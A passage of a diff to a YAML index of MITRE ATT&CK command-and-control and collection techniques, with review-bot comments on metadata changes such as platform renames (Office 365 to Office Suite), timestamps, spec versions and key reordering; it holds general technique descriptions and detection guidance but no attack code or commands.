+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
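Review bot: the new description text for T1001.003 carries two citation markers, `(Citation: ESET Okrum July 2019)` and `(Citation: Malleable-C2-U42)`, and both resolve to entries added under `external_references` in this hunk, so the object is self-consistent; the `x_mitre_version` jump from `'1.0'` to `'2.0'` is in line with a rename plus scope change. The unchanged `x_mitre_detection` text is upstream ATT&CK content and not something to fix in this repo. Note that `x_mitre_modified_by_ref` is removed near the top and re-added at the bottom, so the diff presents the whole object as rewritten when only the name, description, version, contributor, `revoked: false` and two references actually changed.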
@@ -38700,7 +39192,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -38760,7 +39251,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -38792,7 +39282,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -38818,8 +39308,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -38886,7 +39374,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests: []
T1105:
@@ -38984,7 +39471,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests: []
T1665:
@@ -39077,7 +39563,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -39101,7 +39586,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -39124,8 +39609,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -39150,7 +39633,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -39170,8 +39653,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -39225,7 +39706,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests: []
T1102.001:
@@ -39250,7 +39730,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -39276,8 +39756,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -39331,7 +39809,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -39407,7 +39884,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests: []
T1113:
@@ -39464,7 +39940,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests: []
T1557:
@@ -39558,7 +40033,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -39637,7 +40111,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1602:
@@ -39676,7 +40149,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39691,30 +40164,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
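Review bot: T1602 keeps `x_mitre_attack_spec_version: 2.1.0` as an unchanged context line while its `spec_version: '2.1'` is removed, whereas the earlier hunks for T1104, T1205.001 and the others remove both fields together. Either the source bundle really carries the field on T1602 and not on those, or the generator handled the two cases differently; worth checking before merge so the index does not end up in three states (3.2.0, 2.1.0, absent). The T1213.002 part of the hunk is the same header-block relocation seen for T1001.003, with `modified` advancing to `2024-10-14T22:11:30.271Z`.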
@@ -39723,13 +40176,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -39743,20 +40200,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
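Review bot: the T1213.002 platform list changes from `Office 365` to `Office Suite`, a `Cloud Service: Cloud Service Metadata` data source is added, and `x_mitre_permissions_required` with its single `User` entry is dropped, with `x_mitre_version` moving from `'1.0'` to `'1.1'`. Any per-platform index or filter that matches the literal string `Office 365` will silently stop including this technique; confirm that the platform index generators and any platform-name-to-file mapping were updated to the new platform names in this same PR. The T1123 tail of the hunk only advances `modified`.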
@@ -39799,7 +40273,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -39824,7 +40297,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39844,22 +40317,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39876,11 +40351,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
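Review bot: for T1114 both `Office 365` and `Google Workspace` are removed from `x_mitre_platforms` and replaced by the single `Office Suite` entry, alongside the `x_mitre_version` bump from `'2.5'` to `'2.6'`. A Google Workspace platform index built by filtering on the `Google Workspace` platform string will therefore lose T1114, even though the new name presumably subsumes both suites; if the per-platform indexes are meant to keep covering Google Workspace, the mapping from platform name to index file needs to treat `Office Suite` as covering it, and the regenerated CSVs should be checked for that technique.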
@@ -39896,37 +40370,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -39938,75 +40403,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests: []
T1114.001:
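Review bot: the key-reordering churn in this hunk buries the few substantive changes. For both T1025 and T1074.001, `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`/`type`/`created` and `external_references` simply move from the head of the object to its tail, while the real edits are the `modified` timestamps, the added `revoked: false`, `x_mitre_attack_spec_version: 3.2.0`, and the Prevailion DarkWatchman reference switching to a web.archive.org URL. If the generator emitted keys in a fixed (sorted) order, regenerating from a new ATT&CK bundle would give a minimal diff and reviewers could see the real changes.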
@@ -40033,7 +40516,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
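Review bot: `modified` for T1114.001 moves backwards from 2021-04-29 to 2020-03-24, and the same regression appears later in the patch for T1005 (2023-05-09 to 2023-04-12), T1560.002, T1602.002, T1185, T1557.001 and T1125. Every old value shares the `T14:00:00.188Z` release-stamp pattern, so the new source presumably carries the per-object timestamp instead; that is acceptable, but any consumer that detects updates by comparing `modified` will read these as no-ops or downgrades, so the switch deserves an explicit mention in the commit message.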
@@ -40057,13 +40540,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -40084,6 +40565,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -40107,8 +40589,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -40133,7 +40617,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -40200,12 +40683,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests: []
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -40239,10 +40721,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -40253,13 +40737,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
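Review bot: T1530 drops the `Google Workspace` and `Office 365` entries from `x_mitre_platforms` in favour of `Office Suite` (T1114.003 does the same further down); any per-platform index or filter that selects on the old names will silently lose these techniques unless the generator maps `Office Suite` back to those views, so regenerate or re-map the platform-specific indexes in the same change.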
@@ -40300,37 +40785,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
